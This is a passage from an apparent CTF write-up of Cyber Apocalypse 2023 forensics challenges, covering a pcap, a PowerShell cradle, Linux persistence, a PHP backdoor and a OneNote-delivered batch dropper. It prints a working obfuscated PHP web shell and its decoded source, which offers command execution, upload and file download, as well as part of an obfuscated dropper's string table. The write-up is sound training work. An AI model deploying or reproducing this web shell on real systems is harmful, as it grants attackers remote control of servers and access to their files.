 r.recvuntil(": ")
 r.sendline(str(ans1[i]))
 while True:
 temp = r.recvline()
 if b"Balance" in temp:
 total = int(temp.strip().decode()[len("Balance: "):])
 print(total)
 break


r.recvuntil("vessels\n")
r.sendline("3")
print(r.recvline())

Flag is: HTB{7h3_vess3ls_4r3_des7r0yed_g0od_j0b}

Original Post

Cyber Apocalypse 2023: The Cursed Mission - Forensics

Mon, 27 Mar 2023 00:00:00 +0000

Table of Contents

Plaintext Tleasure

Given file: Get it here!
Description: Threat intelligence has found that the aliens operate through a command and control server hosted on their infrastructure. Pandora managed to penetrate their defenses and have access to their internal network. Because their server uses HTTP, Pandora captured the network traffic to steal the server’s administrator credentials. Open the provided file using Wireshark, and locate the username and password of the admin.
Category: Forensics
Difficulty: Very Easy

We are given a network pcap file. Although we can solve this challenge using Wireshark, but to keep it simple for the very first challenge, we will use strings and grep to get the flag.

Here we use strings to dump out strings from the pcap file, then use pipe (|) and grep to find for strings that match the flag format - HTB{.

Flag is: HTB{th3s3_4l13ns_st1ll_us3_HTTP}

Alien Cradle

Given file: Get it here!
Description: In an attempt for the aliens to find more information about the relic, they launched an attack targeting Pandora’s close friends and partners that may know any secret information about it. During a recent incident believed to be operated by them, Pandora located a weird PowerShell script from the event logs, otherwise called PowerShell cradle. These scripts are usually used to download and execute the next stage of the attack. However, it seems obfuscated, and Pandora cannot understand it. Can you help her deobfuscate it?
Category: Forensics
Difficulty: Very Easy

For this challenge, we are given a Powershell Script file. In the script, the flag is being concatenated using some Powershell ~~magic~~ lines of code.

Flag is: HTB{p0w3rsh3ll_Cr4dl3s_c4n_g3t_th3_j0b_d0n3}

Extraterrestrial Persistence

Given file: Get it here!
Description: There is a rumor that aliens have developed a persistence mechanism that is impossible to detect. After investigating her recently compromised Linux server, Pandora found a possible sample of this mechanism. Can you analyze it and find out how they install their persistence?
Category: Forensics
Difficulty: Very Easy

In this challenge, we are given a shell script to look for the flag.

For the sake of understanding the flow of shell scripting, the script checks whether the username is Pandora and the hostname is linux_HQ. If the check is fulfilled, it starts the process to write the base64 decoded message into the file /usr/lib/systemd/system/service.service.

The decoded message turned out to contain the flag for our challenge.

Flag is: HTB{th3s3_4l13nS_4r3_s00000_b4s1c}

Roten

Given zip: Get it here!
Description: The iMoS is responsible for collecting and analyzing targeting data across various galaxies. The data is collected through their webserver, which is accessible to authorized personnel only. However, the iMoS suspects that their webserver has been compromised, and they are unable to locate the source of the breach. They suspect that some kind of shell has been uploaded, but they are unable to find it. The iMoS have provided you with some network data to analyze, its up to you to save us.
Category: Forensics
Difficulty: Easy

After filtering the packets by http.request.method == POST, we saw an interesting packet there.

The packet 1929 has a MIME type of application/x-php, following the HTTP stream to see the php backdoor, we found this interesting php codes:

<?php
$pPziZoJiMpcu = 82;
$liGBOKxsOGMz = array();
$iyzQ5h8qf6 = "" ;
$iyzQ5h8qf6 .= "<nnyo ea\$px-aloerl0=e r\$0' weme Su rgsr s\"eu>\"e'Er= elmi)y ]_'t>bde e e =p xt\" ?ltps vdfic-xetrmsx'l0em0 o\"oc&'t [r\"e _e;eV.ncxm'vToil ,F y";
$iyzQ5h8qf6 .= "<r s -<a \"op r_P< poeeihaeild /ds\"se4bsxao1: r]du ;e\$'o,t dn\n)i\$'me'maoate{e I!lb>'u btde .sr ege/ han:t";
$iyzQ5h8qf6 .= "elrlenjl t>( 0'eCdd0 l et0\n'seu u it ;e_ dc>ulUd'T\nxe\$L<er<.l oh>c ii aert pdt iai(ed.QiJr\n\$i0; 0\"e0' d= ex ].xp\$r re \nwSn'u<lup ]o iluE/=>b\$t r>\n";
$iyzQ5h8qf6 .= "h rxn ltmb \n'-aodd') bubaa\nff0 i0] )- [ &\"4 ==e[wn (r #iEa tftelF)U sspSb\"'rd dO o e_t ppso \n]DpneaC;aoesvp\ni( }f0 & ' \"( ]0 =sc'o \$s #nRmaeoi=oi)p te";
$iyzQ5h8qf6 .= "l[>c;>ia ew agP aw(d i;ep:rto\nnor/a/<l )\n( = ?;\$r\$0 0 'puwr\$\$d\" fgVeu'rp'al l s o'<o\n<rs rn \" leeetu\$y f\nsl (en dtyjS3?e\$ ) 0 \ngem0= xrtrlsdi; l E=t>ma\"d";
$iyzQ5h8qf6 .= "e{o iafbl\nb. }ee < ptrchid> cia''t s qc.p)m{ \$ (0' rao0 ) 'ieid;ir\n adR'o\\ r.''\na ifdiro >'\$\ndr<t apmh(di\" ( rctE)";
$iyzQ5h8qf6 .= "e mtlur3h;o m{\$2x odd0( )n't[\nr) gi[dcnat\$ d n Dl>r R k}\"<tr twso\$(r; i iatx;n iriei.p\nd\$ o m0' u\"e1\$\$ ";
$iyzQ5h8qf6 .= " t]e'} ) } r'io\"c/_in ' (ie': e&e\n>/b> hu( df)\n s ptap\nt nabrp6\n et d\$o0 p] )ogi?f)'r\n= \n=ePrm;tfGda";
$iyzQ5h8qf6 .= " ]e\"mrT;r s&ye\nto\" (i\$\"ii e s tici - ipryt/\n y etd): [ & wrf (;]e\n { cH'p\nioE=m [c.oeo\ne u c hd; \$dd<rl.c e iohr L fca/ jf &p ye ";
$iyzQ5h8qf6 .= "\"= ?no('\"\n,a\n\$\n HtP leorT'e 'h\$vcU d l'=h >y\n d(it.e h t onme e idr1-su e &p ?' e 0 eu t% d\$_ To_vecnm[f= nouetp \" t.";
$iyzQ5h8qf6 .= ">o \n> eifrd'o\"o ( n/es n eny.-/n 0=e e& - x(0'rp\$'1 \$'dP BrSath=-'i' a p_ol > \$ \n cri)>/w< \$i🔛 g ";
$iyzQ5h8qf6 .= "d. 1>bc x'l0= ''\$e\$0x[[m s g]iO {yEleo'ddls m\"luro E}o_\$\"< < h.l <'n/\" _f ct t c-2\not 2dsx'0w;gcm0''\"o:% r,rS W Lu= \"aieu\$e<opya r\nfG";
$iyzQ5h8qf6 .= "v<t ? o'e.a.et< G Ft;0 h Co-.<oi 0'eAs0'\nruo2 eed 1 o T 0\"Fe'\".trTbu'bal)d r\n Eabh p /o \$rd/ E(ie ' :eSm>2stoi0; 0'4 otd):xxe's u\$=[ ";
$iyzQ5h8qf6 .= " w '=o<\$a'omp]rdo)' o}cTlre h \"'w\"hv(>t Tfltf) xS/\n/csnf0 i0;0: uee ee T% pw ' \$_.]\"f/_']Uil)>Da ] r\no[u>a p <.n<ra\$\\a [ie-i; 'i b<jrt ( }f0 0 ";
$iyzQ5h8qf6 .= "p\" ?'cc&'1 [o\$d dR ..ffS>.pto;<id{[} \nm'e\"d \n t\$e/eldnb 'l sl\n t-osqirp )\n( })' []& -uu ;s\$'r_ii iO\$\"\$'oE";
$iyzQ5h8qf6 .= "\\\"l'a\nbre\n' uimc);> fidvrtfui\"l deTte .;-ocupar\$ )\n - \" ''tt0\n\"selGrf rtd'd rRn'o>d red nepfam \n\n<o";
$iyzQ5h8qf6 .= "f>a(d=er;e o_rrn h \n>tretpim{ \$ ?' w=0w;eex ,.xdE' _i iamV\"/a\"D >c_ all nd{? tr <l\$>').\n> weaea ef \nsir .no ";
$iyzQ5h8qf6 .= "m{ ; r 0'\n'\"2 =e[T](\$=Armru>E;>d;i <tf mso(d'\n> he(aud\\\" ' \" nxnam ai <tpysmtd\$ o '\n i(0 ]]0 \$sc'[;if _ e.t\"R\n '\nr boi eeai ] \n >ai ein../ ; lisme ";
$iyzQ5h8qf6 .= "dl lrt.riPet d\$ r \$t\$0: = 0 opuw'\nsi'D.t\"o;[e\">ee rl ' dse, \n Pcsh)r\" ' \n osf'= ee ia mcne y et ' gem4 == wrtrd}_l.a h f\n'c;\\cc sye ]{isx <";
$iyzQ5h8qf6 .= " eh_r .;\$\". \n ate)\" rs npsi=.r&p y r\"o)' ' ) nieii\nfe/Y\"o/oePh\nnht t.( .\nnee\$ t r de.'\n_'\$ \n dsr;' (i k/rn\"jm e &p : o]d - x( en'tr\$i '}<d>ccHoe<o";
$iyzQ5h8qf6 .= "o y\"\$ ' gtcc a<m(if / S>v ? '('\n. 'z 3c.hss0=e e u e?' '\$\$ rt]e'fl=;\n/=\"uhP cb ril._ (um bti\$r=\"' E\"a > ]\$) b Pe r.=jt\"(x'l0=e' p= ; )gw\$[f)']ie \n\$h";
$iyzQ5h8qf6 .= "';so_\"hr\"yfe<F u f\$td lrsd('/. R.l \n )f; a r(}e3\"st>\$1csx'l- [ &'\n ros'(;];l(\$}d2G\n> S<o>< =/I p i_ir e>sir\"'\$ V u}\n )i\n s a\$\nl.h\"p<f0'e8l";
$iyzQ5h8qf6 .= "s' \"( r i?or=r\"\n,\ne\$d\ni>Ee\\\"Ei </=('bL l lGoe \nire.>v E\$e\n\n l ehgf}=6t>:/i0; 0'e;\$r\$0' f ulse% i di\$r\"Tcn\\Ln\"id fc>E o eEns c osa \"a Rv) \n {e";
$iyzQ5h8qf6 .= " nemi\n\"/t</sl0 i0; \noem0 ('pdpa1 \$f=irds;'h<nFp<ni\$io<S a T:u l n l\$.l [a) < \n) aaal\nscp//ce }f0 \$ wao0: s[[rds w r;i \n>o";
$iyzQ5h8qf6 .= "i<'uipvdll/[ d '[ l a sap_ u 'l[ / ) md:e?tsssmr))\n( }t ndd1 \$''\"i'% o(')\nr=e\" nb]tnu>ieob' e .'<t s <saS\$e}Pu";
$iyzQ5h8qf6 .= "n d ee )>ys:cai )\ny e\"e0' m een]1 ri') c;\"pr. pt\"r_rrfed \$c/) s / tEv)\nHea i { (rp)\nl//rxp{{ \$ p r] )- o:xxt,s ls; =sh\n<u>\"tu";
$iyzQ5h8qf6 .= " ;.e:>ic umb; = t\$hRa) P m v \n \$(u;\neb/ict\n m{ e [ & ' d eef % ds\n{ coeit\\'ytt\n'xr<lhs pd>\n \" hk(Vl[ _.e > f'b\n<soapd> \$ o = \"=";
$iyzQ5h8qf6 .= " ?;\$e'cc(\$1 [ei\n ra cn n p y\n/ie/eou l'< et >e\$Eun S ] \n iCl hhojtn\n t d\$ ' e 0 \nw Suu\"os\$'tf en\"hpt<metpi'sdbT c o]b ca";
$iyzQ5h8qf6 .= "<\nydRea E\" e< hlai teta>.\n y et u x(0' o&'tt%w\"se( ad\\ouyde=yef.t'ro'c a)r hbt i[ m L<.c/ eecc mesx\nb< p y '\$e\$0x r ;ee1n,.x\$( lin tpit'p";
$iyzQ5h8qf6 .= "= bs>>U<e d)> olh =r'.e F/\"hh \$ a)h' ltt.\nod e &p ;ocm2' l0\n'\"se =e_\$ pr<\" evhhe'(a(E\"pbseD \" e> >.P ] 'a<ot f hd.e) >\"r";
$iyzQ5h8qf6 .= "g<oi =e e \nwuo0 dx ]]\"r\$scPd a(b<t= oi=sis\$r;lrsci{; \" N 'H\" ]>/ m i ee'-; \n ao!tv 'l0=e ntd): [8 = ,[gpuOi t\$riy'cdd'useur\no>fhr\n\n \$ta \$/P<.e <t\"";
$iyzQ5h8qf6 .= "l l ar\"C\n <hpo-s psx'l eee \"0 == 'rrtSr hd>npsl=dfbsnpo a<uoe vam v'_/ l./d<> e d('o !r.g-tc\$'e6-s r\" ?' e0 ' \$woieT (i<peua'eime";
$iyzQ5h8qf6 .= "alr dbl c fabe<a.Sa\"s t>/ e')n -eml rlm; 0'e []& - x x(trun'[= \$rfu=bsPnlitmo. 'rl't oll</l\$E><e\"d<t = rC;t -fieLaao i0; \" ''\$e) ";
$iyzQ5h8qf6 .= "'\$yipt]'= d)ot'msO'et(ea ]>y<o rue/tuvL</ ?>tr (o\nr =naapsd}f0 i w=0w;wc )wpt[f)d i;r ti=S ''\$(dF [< br ee-treaF/t{d<d> \$h";
$iyzQ5h8qf6 .= "'n o L\".ptcse\n( }f r 0'\nou\$ oee'(;iN r\nmtet'Tn _\$Di 'biry a hh>)l'td\not>\" _eCt l rahcied= )\n( i(0 rtoi?r)'r\"\nrU e.e yx'n'anvP_il t>n>. c";
$iyzQ5h8qf6 .= "\\o>\n u]d> wd ; Gaoe : ettsssn\"= \$ \$t\$4: lewf l;]e% 'L c'capt a maaOFre mF <' hnv\n {e >< n>\"\n Ednn aets.t.c m{ \$oem0 d\"n('d\n,a1 ]L h/hce'vveemlS";
$iyzQ5h8qf6 .= "Ie }pi'b<ee <e \n).<t l\" } Tett m dsp\"c cof o mw\"o)' []e s[ ds ) o'ot= abn=euTLca\n_l.r/cx(br ) td o..\n [re- u ft:>oconi d\$ on]d - ";
$iyzQ5h8qf6 .= "\" r\$'' \$'% )oe . i'nlac'=e[Etl ne\$>bhe\$r )\"d> a e '(nD s i /\nmomtl et de e?' w=[m e o]1 rc\$\$\"ohaurtd'='Sor a d<>occ>t < ?> dppc d";
$iyzQ5h8qf6 .= "'ti t lc/\n/m/ae y er= ; r \"o:x w,s { hfv<nime-yif's[re m'ib< (m\"a / {d\"\" =orh oC-s -heom<apbip &p [ &'\n i(ed e n % \n!oiah=de=fpriUu'ya e.r b\"'d;b t";
$iyzQ5h8qf6 .= " \ni. \"sio woTp re(ma!jionee e &\"( r \$t\$xe'c e\$1 i ll2'd='oe'lpbf)d '\$.sr<cr\nl h r . .in ";
for($i = 0; $i < $pPziZoJiMpcu; $i++) $liGBOKxsOGMz[] = "";
for($i = 0; $i < (strlen($iyzQ5h8qf6) / $pPziZoJiMpcu); $i++) { for($r = 0; $r < $pPziZoJiMpcu; $r++) $liGBOKxsOGMz[$r] .= $iyzQ5h8qf6[$r + $i * $pPziZoJiMpcu]; }
$bhrTeZXazQ = trim(implode("", $liGBOKxsOGMz));
$bhrTeZXazQ = "?>$bhrTeZXazQ";
eval( $bhrTeZXazQ );
?>

That doesn’t look nice, let’s replace eval by echo and execute this to see decoded codes:

?><?php

if (isset($_GET['download'])) {
 $file = $_GET['download'];
 if (file_exists($file)) {
 header('Content-Description: File Transfer');
 header('Content-Type: application/octet-stream');
 header('Content-Disposition: attachment; filename="'.basename($file).'"');
 header('Expires: 0');
 header('Cache-Control: must-revalidate');
 header('Pragma: public');
 header('Content-Length: ' . filesize($file));
 readfile($file);
 exit;
 }
}

?>

<html>
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css">

<!-- jQuery library -->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.2/jquery.min.js"></script>

<!-- Latest compiled JavaScript -->
<script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/js/bootstrap.min.js"></script>

<div class="container">

<?php

function printPerms($file) {
 $mode = fileperms($file);
 if( $mode & 0x1000 ) { $type='p'; }
 else if( $mode & 0x2000 ) { $type='c'; }
 else if( $mode & 0x4000 ) { $type='d'; }
 else if( $mode & 0x6000 ) { $type='b'; }
 else if( $mode & 0x8000 ) { $type='-'; }
 else if( $mode & 0xA000 ) { $type='l'; }
 else if( $mode & 0xC000 ) { $type='s'; }
 else $type='u';
 $owner["read"] = ($mode & 00400) ? 'r' : '-';
 $owner["write"] = ($mode & 00200) ? 'w' : '-';
 $owner["execute"] = ($mode & 00100) ? 'x' : '-';
 $group["read"] = ($mode & 00040) ? 'r' : '-';
 $group["write"] = ($mode & 00020) ? 'w' : '-';
 $group["execute"] = ($mode & 00010) ? 'x' : '-';
 $world["read"] = ($mode & 00004) ? 'r' : '-';
 $world["write"] = ($mode & 00002) ? 'w' : '-';
 $world["execute"] = ($mode & 00001) ? 'x' : '-';
 if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
 if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
 if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
 $s=sprintf("%1s", $type);
 $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
 $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
 $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
 return $s;
}


$dir = $_GET['dir'];
if (isset($_POST['dir'])) {
 $dir = $_POST['dir'];
}
$file = '';
if ($dir == NULL or !is_dir($dir)) {
 if (is_file($dir)) {
 echo "enters";
 $file = $dir;
 echo $file;
 }
 $dir = './';
}
$dir = realpath($dir.'/'.$value);
##flag = HTB{W0w_ROt_A_DaY}
$dirs = scandir($dir);
echo "<h2>Viewing directory " . $dir . "</h2>";
echo "\n<br><form action='".$_SERVER['PHP_SELF']."' method='GET'>";
echo "<input type='hidden' name='dir' value=".$dir." />";
echo "<input type='text' name='cmd' autocomplete='off' autofocus>\n<input type='submit' value='Execute'>\n";
echo "</form>";
echo "\n<br>\n<div class='navbar-form'><form action='".$_SERVER['PHP_SELF']."' method='POST' enctype='multipart/form-data'>\n";
echo "<input type='hidden' name='dir' value='".$_GET['dir']."'/> ";
echo "<input type='file' name='fileToUpload' id='fileToUpload'>\n<br><input type='submit' value='Upload File' name='submit'>";
echo "</div>";

if (isset($_POST['submit'])) {
 $uploadDirectory = $dir.'/'.basename($_FILES['fileToUpload']['name']);
 if (file_exists($uploadDirectory)) {
 echo "<br><br><b style='color:red'>Error. File already exists in ".$uploadDirectory.".</b></br></br>";
 }
 else if (move_uploaded_file($_FILES['fileToUpload']['tmp_name'], $uploadDirectory)) {
 echo '<br><br><b>File '.$_FILES['fileToUpload']['name'].' uploaded successfully in '.$dir.' !</b><br>';
 } else {
 echo '<br><br><b style="color:red">Error uploading file '.$uploadDirectory.'</b><br><br>';

 }

}

if (isset($_GET['cmd'])) {
 echo "<br><br><b>Result of command execution: </b><br>";
 exec('cd '.$dir.' && '.$_GET['cmd'], $cmdresult);
 foreach ($cmdresult as $key => $value) {
 echo "$value \n<br>";
 }
}
echo "<br>";
?>

<table class="table table-hover table-bordered">
 <thead>
 <tr>
 <th>Name</th>
 <th>Owner</th>
 <th>Permissions</th>
 </tr>
 </thead>
 <tbody>
<?php
foreach ($dirs as $key => $value) {
 echo "<tr>";
 if (is_dir(realpath($dir.'/'.$value))) {
 echo "<td><a href='". $_SERVER['PHP_SELF'] . "?dir=". realpath($dir.'/'.$value) . "/'>". $value . "</a></td><td>". posix_getpwuid(fileowner($dir.'/'.$value))[name] . "</td><td> " . printPerms($dir) . "</td>\n";
 }
 else {
 echo "<td><a href='". $_SERVER['PHP_SELF'] . "?download=". realpath($dir.'/'.$value) . "'>". $value . "</a></td><td>". posix_getpwuid(fileowner($dir.'/'.$value))[name] ."</td><td> " . printPerms($dir) . "</td>\n";
 }
 echo "</tr>";
}
echo "</tbody>";
echo "</table>";

?>

</div>
</html>

Looking at the comment, we can see the flag there.

Flag is: HTB{W0w_ROt_A_DaY}

Relic Maps

Given file: Get it here!
Description: Pandora received an email with a link claiming to have information about the location of the relic and attached ancient city maps, but something seems off about it. Could it be rivals trying to send her off on a distraction? Or worse, could they be trying to hack her systems to get what she knows?Investigate the given attachment and figure out what’s going on and get the flag. The link is to http://relicmaps.htb:/relicmaps.one. The document is still live (relicmaps.htb should resolve to your docker instance).
Note: This challenge had a docker but it might be closed at the time you are reading this. All needed files will be given in the write-ups.
Category: Forensics
Difficulty: Medium

From the link attached to this challenge, we get an Onenote file named relicmaps.one. Analyze the file, we get 2 suspicious links, which lead us to 2 different files, http://relicmaps.htb/uploads/soft/topsecret-maps.one and http://relicmaps.htb/get/DdAbds/window.bat.

I did some analysis on the file topsecret-maps.one, and there are only some PNGs inside it. In the window.bat file, we are given a Powershell Script. You can run it directly, but I choose to deobfuscate using Python to understand its flow.

dict = """
%eFlP%"ualBOGvshk=ws"
%eFlP%"PxzdwcSExs= /"
%eFlP%"ndjtYQuanY=po"
%eFlP%"cHFmSnCqnE=Wi"
%eFlP%"CJnGNBkyYp=co"
%eFlP%"jaXcJXQMrV=rS"
%eFlP%"nwIWiBzpbz=:\"
%eFlP%"xprVJLooVF=Po"
%eFlP%"tzMKflzfvX=0\"
%eFlP%"VCWZpprcdE=1."
%eFlP%"XzrrbwrpmM=\v"
%eFlP%"BFTOQBPCju=st"
%eFlP%"WmUoySsDby=he"
%eFlP%"tHJYExMHlP=rs"
%eFlP%"JPfTcZlwxJ=do"
%eFlP%"VxroDYJQKR=y "
%eFlP%"UBndSzFkbH=py"
%eFlP%"KXASGLJNCX=ll"
%eFlP%"vlwWETKcZH=em"
%eFlP%"OOOxFGwzUd=e""
%eFlP%"NCtxqhhPqI=32"
%eFlP%"GOPdPuwuLd=\W"
%eFlP%"XUpMhOyyHB=ex"
%eFlP%"cIqyYRJWbQ=we"
%eFlP%"kTEDvsZUvn=nd"
%eFlP%"XBucLtReBQ=Sy"
%eFlP%"JBRccySrUq=ow"
%eFlP%"eNOycQnIZD=xe"
%eFlP%"chXxviaBCr=we"
%eFlP%"YcnfCLfyyS=in"
%eFlP%"lYCdEGtlPA=.e"
%eFlP%"pMrovuxjjq=he"
%eFlP%"UrPeBlCopW=ll"
%eFlP%"ujJtlzSIGW= C"
%eFlP%"zhNAugCrcK="%~0."
%eFlP%"ZqjBENExAX=s\"
%VhIy%"dzPrbmmccE=cd"
%VhIy%"xQseEVnPet= "%~dp0""
%eUFw%"wxzMwkmbmY=gDBN"
%eUFw%"VavtsuhNIN=F'[-"
%eUFw%"AHKCuBAkui=r = "
%eUFw%"ARecVABHyu=uZOc"
%eUFw%"AbZpTpKurz=6] -"
%eUFw%"BaMYsIgnsM=$uZO"
%eUFw%"JBUgbyTPxp=m(, "
%eUFw%"vGOYQQYIpx=.-16"
%eUFw%"yPzFwnsYdA= New"
%eUFw%"zuIYfGJIhV=O.Me"
%eUFw%"gbXeIdPSoj='[-1"
%eUFw%"BqEMjgsfHM=]::("
%eUFw%"bivuMABwCB=Invo"
%eUFw%"SJsEzuInUY=ile "
%eUFw%"htJeDhbeDW=();$"
%eUFw%"ZygfZJxAOd=acUA"
%eUFw%"eDhTebXJLa="%~nx0."
%eUFw%"YlKbYsFYPy=in $"
%eUFw%"jdKMRqipbM=e]::"
%eUFw%"GVIREkvxRa=();$"
%eUFw%"OckpqzbYcn=n ''"
%eUFw%"UPfjubfNXt=Mr, "
%eUFw%"AkaPyEXHFq=esMa"
%eUFw%"LODxmGMGqq=flec"
%eUFw%"hImzprlFyw=pose"
%eUFw%"VZAbZqJHBk=1] -"
%eUFw%"WYJXnBQBDj= [Sy"
%eUFw%"rSVBNvbdPT=stem"
%eUFw%"tVtxVGNpFB=vert"
%eUFw%"tHHIjVCHeH=::De"
%eUFw%"WvjMoIIiUn=);$b"
%eUFw%"vmIEtsktnA=ypto"
%eUFw%"AbMyvUGzSH=fore"
%eUFw%"zDUDeXKPaV=..-1"
%eUFw%"INPLAzQfUo== [S"
%eUFw%"ArAxZuPIrp== $B"
%eUFw%"nGqMpclaJV=ZOcm"
%eUFw%"lfYSggLrsL=null"
%eUFw%"eQPFkQsLmh=hy.A"
%eUFw%"AyyrPvjwjr=;$mN"
%eUFw%"rjhOhltPzI=Disp"
%eUFw%"WojQSFImBz=17js"
%eUFw%"SKEwAQBRlN=$Nlg"
%eUFw%"KytxcYPZKt=YiLG"
%eUFw%"RGlZIMTaRM=urit"
%eUFw%"igJmqZApvQ=ss -"
%eUFw%"dGSGnKbkQW=pose"
%eUFw%"lSUnvlNyZI=tem."
%eUFw%"rddZbDFvhl=)))"
%eUFw%"KHqiJghRbq=and "
%eUFw%"WPGlloqWfh=ddin"
%eUFw%"pLUeCEDcNj=]::C"
%eUFw%"drymkVAnZW=);$B"
%eUFw%"KdByPVjCnF=ring"
%eUFw%"VnDoNvCbDL=orF'"
%eUFw%"GapFScCcpe=ke($"
%eUFw%"iVrCyJhMiJ=fc6t"
%eUFw%"oMsMdPYmPd=ert]"
%eUFw%"odWdfvJnBE=Lk ="
%eUFw%"ekEoGMuERC=yste"
%eUFw%"QMmDXFyyag=Syst"
%eUFw%"cYinxarhDL=lit("
%eUFw%"bIgeRgvTeJ=ap.T"
%eUFw%"acXjUrxrpX=raph"
%eUFw%"SCbDgQuqTU=ay()"
%eUFw%"YYKSCuCbgJ=New-"
%eUFw%"YnGvhgYxvb=cm ="
%eUFw%"vnHosfjdeN=;$Pt"
%eUFw%"LIQYgFxctD=d;$B"
%eUFw%"olHsTHINJO=[Env"
%eUFw%"WQqetkePWs=NVPb"
%eUFw%"AGOCIKFMEK=::('"
%eUFw%"QbKdEZdxpx=uGcO"
%eUFw%"RWcegafVtf=daeR"
%eUFw%"ESpdErsKEO=pher"
%eUFw%"kJjQuXIjOT=.Con"
%eUFw%"dbDMRBPrxg=uGcO"
%eUFw%"mBIWiJNHWZ=esaB"
%eUFw%"WmHvayPxwd=.Mem"
%eUFw%"oQYrpYRHsU=stem"
%eUFw%"HFLAqJuuyu=ew-O"
%eUFw%"JhYYmEHfJT=ing("
%eUFw%"pTKKchMUFD=BC;$"
%eUFw%"vShQyqnqqU=exe""
%eUFw%"PjdRUyhsyG=[]] "
%eUFw%"VUeZKgDBUe=.Com"
%eUFw%"oNvGdyNkLt=oArr"
%eUFw%"IAkZpnEseT=UA.I"
%eUFw%"haSZYOmkiA=bstr"
%eUFw%"tzSNMWchGN=]::N"
%eUFw%"YKwLsVwqOj=Fina"
%eUFw%"MFRjJyYsrs=k; }"
%eUFw%"EdLUuXiTNo=File"
%eUFw%"nMbUuONTOk=7;$B"
%eUFw%"OAsjgKHKoH= = N"
%eUFw%"LLNnWnTLBJ=$bTM"
%eUFw%"xVIsxobyZi= '')"
%eUFw%"pUKFMEPFQs=onve"
%eUFw%"DDiJEpaiME=acUA"
%eUFw%"ENADhKPHot= [st"
%eUFw%"WTAeYdswqF=.IO."
%eUFw%"hVncqdtHrj=[Sys"
%eUFw%"EUwICZcugV=);$N"
%eUFw%"USLedfRsdA=ispo"
%eUFw%"YULKJDZpgz=t Sy"
%eUFw%"BlIFABuPAW=ress"
%eUFw%"gNabAkLFGN=();$"
%eUFw%"cGJiVEdEzp=ZOcm"
%eUFw%"OpWuyrggtP=ddin"
%eUFw%"NbOjNijxuU=.Len"
%eUFw%"EuMCNHEVeC=nirt"
%eUFw%"iHRclHpeVX=-joi"
%eUFw%"zFvgtBzUer=Comp"
%eUFw%"klVPUdMJas=ecry"
%eUFw%"tBsRPAyhtG=;$gD"
%eUFw%"uOGlqENvnk=$NVP"
%eUFw%"WSRbQhwrOC=$eIf"
%eUFw%"gFQQimTbzp=bjec"
%eUFw%"FCBcNynRGD=Bmor"
%eUFw%"gNELMMjyFY=-win"
%eUFw%"pqWXTkasXe=+M0z"
%eUFw%"pjrIjvjdGR=tryP"
%eUFw%"aGQeJYSFDZ=m.Re"
%eUFw%"hknFiXCnZQ=ion."
%eUFw%"MxwsyqmvYm=.Cre"
%eUFw%"FijcPoQLnC=ne);"
%eUFw%"VGKsxiJBaT=.Sec"
%eUFw%"roXhULjavE=pres"
%eUFw%"FraARuTjiq=($Yi"
%eUFw%"rEvTlCThdH=VIHX"
%eUFw%"JCuNlxqlBZ=:: '"
%eUFw%"BANrSlObpx=nage"
%eUFw%"CMHWMmXlZO=eam("
%eUFw%"MtoMzhoqyY=bypa"
%eUFw%"xfHbUEWpFC=-Obj"
%eUFw%"ktDjVGpvOa=pStr"
%eUFw%"hzjnwzdyGY=ct S"
%eUFw%"HkiSTlwlIs=-4] "
%eUFw%"AnKEeEZdOq=rans"
%eUFw%"doKcadyJqy=xU7e"
%eUFw%"dyJHMHMcNc=S46e"
%eUFw%"jCsFOJQsdv=tem."
%eUFw%"pEeOvclMbZ=PKCS"
%eUFw%"fFqNPWfBWr=se()"
%eUFw%"XEyDmChJvW= = $"
%eUFw%"ZMNBNnhYdl=BacU"
%eUFw%"UmCJMMMcBg=m.IO"
%eUFw%"FcrKUOEnOU=.Cop"
%eUFw%"eYuashSMjP=y.Ci"
%eUFw%"reviZiSttH=oryS"
%eUFw%"xijYXotZPT=Comp"
%eUFw%"yqhJQSZuJo=rAsa"
%eUFw%"QCZuMFaZsV=lBlo"
%eUFw%"DAaZVQYtML=V = "
%eUFw%"gbVsRGzTij=.Key"
%eUFw%"OOiwgwuupI=ose("
%eUFw%"hbFnQgCXwX=Secu"
%eUFw%"AiqHTcPzsv=th('"
%eUFw%"KUKwZheGNw=BNO "
%eUFw%"OonlMOpxYC=tem."
%eUFw%"oFspIELDJK=ewLi"
%eUFw%"isQISZiBPJ=acUA"
%eUFw%"EiWocIreAk=yTo("
%eUFw%"CZpuCIcrKh=Secu"
%eUFw%"ZNBNkxQuUl=.GZi"
%eUFw%"ZPlPiozEyW='')("
%eUFw%"eFWpiweoyr=am;$"
%eUFw%"kEHDlJOIVc=gMod"
%eUFw%"PwJJFMgamh=eHDU"
%eUFw%"nfEeCcWKKK=-ep "
%eUFw%"dAuevoJWoL=gnir"
%eUFw%"BMVjGSkNrk=.Cry"
%eUFw%"GwAFOSfUtV=acUA"
%eUFw%"bSIafzAxiZ=Lk.T"
%eUFw%"uynFENuiYB=iron"
%eUFw%"BGoTReCegg=qq ="
%eUFw%"DXdgqiFTAH=ptog"
%eUFw%"QNxYaFZSBu=);$P"
%eUFw%"shhyfkrTvn=m = "
%eUFw%"fvEtritbuM= = $"
%eUFw%"IwOqmlYsbl=('da"
%eUFw%"EDuGpmwedn=m = "
%eUFw%"rFsKCxpAbv=.Dis"
%eUFw%"HLynrUfwGo=6esa"
%eUFw%"wwmTmFdRsZ=trea"
%eUFw%"IeRiYUFnCZ=Obje"
%eUFw%"kxCYxBSxVM=..-1"
%eUFw%"xULgeMdzcg='0xd"
%eUFw%"vXewtPjogB=$bTM"
%eUFw%"GhTXhmRnCR=, (,"
%eUFw%"MBvrUwPCDz=m.IO"
%eUFw%"KVdpASYkBZ=A.Pa"
%eUFw%"fxpyemHAMo=Stre"
%eUFw%"KtmeCApwQn=tion"
%eUFw%"jWtWLzuDKP=bbqM"
%eUFw%"xllGdjvUjB=em.I"
%eUFw%"ahbOZSBViB=Star"
%eUFw%"MusMeoeDey=Disp"
